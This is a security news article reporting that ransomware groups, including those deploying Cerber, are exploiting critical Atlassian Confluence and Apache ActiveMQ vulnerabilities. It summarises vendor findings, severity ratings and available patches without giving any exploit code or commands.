Critical Confluence and ActiveMQ Vulnerabilities Exploited by Ransomware Groups

Multiple ransomware groups are exploiting critical vulnerabilities in Atlassian Confluence and Apache ActiveMQ, as confirmed by cybersecurity firms like Rapid7, Arctic Wolf Labs, and Huntress. Rapid7 detected the exploitation of CVE-2023-22518 and CVE-2023-22515 in customer environments, leading to Cerber ransomware deployment. These vulnerabilities allow unauthorized creation of Confluence administrator accounts, compromising confidentiality, integrity, and availability. Atlassian, updating its advisory on November 6, raised the CVSS score to 10.0, indicating maximum severity, due to active exploits and ransomware use.

The attack chain involves exploiting vulnerable Confluence servers to fetch and execute ransomware payloads. GreyNoise data shows these attacks originate from IP addresses in France, Hong Kong, and Russia. Arctic Wolf Labs reported a severe remote code execution flaw in Apache ActiveMQ (CVE-2023-46604), being used to deliver SparkRAT and a ransomware variant resembling TellYouThePass.

Huntress confirmed the Atlassian flaw exploitation since November 3, leading to Cerber ransomware infections. The rapidity of these campaigns, from patch release to exploitation, highlights the adversaries’ speed in monetizing vulnerabilities.

Confluence is targeted due to its widespread use in collaboration, making it a prime target for accessing sensitive information and spreading malware. Rapid7’s Managed Detection and Response (MDR) service detected the exploitation of these flaws, affecting both Windows and Linux platforms, with attackers using Python Base64 instructions to download malicious payloads.

Atlassian has released fixed versions of Confluence to address these vulnerabilities, and while Atlassian Cloud users are safe, others with vulnerable sites are urged to update immediately. If updates are not feasible, Atlassian recommends interim risk mitigation measures. The firm also provided information on Indicators of Compromise (IOCs), including IP addresses, domains, file hashes, and ransom notes, to assist in identifying and responding to these threats.

Scroll to Top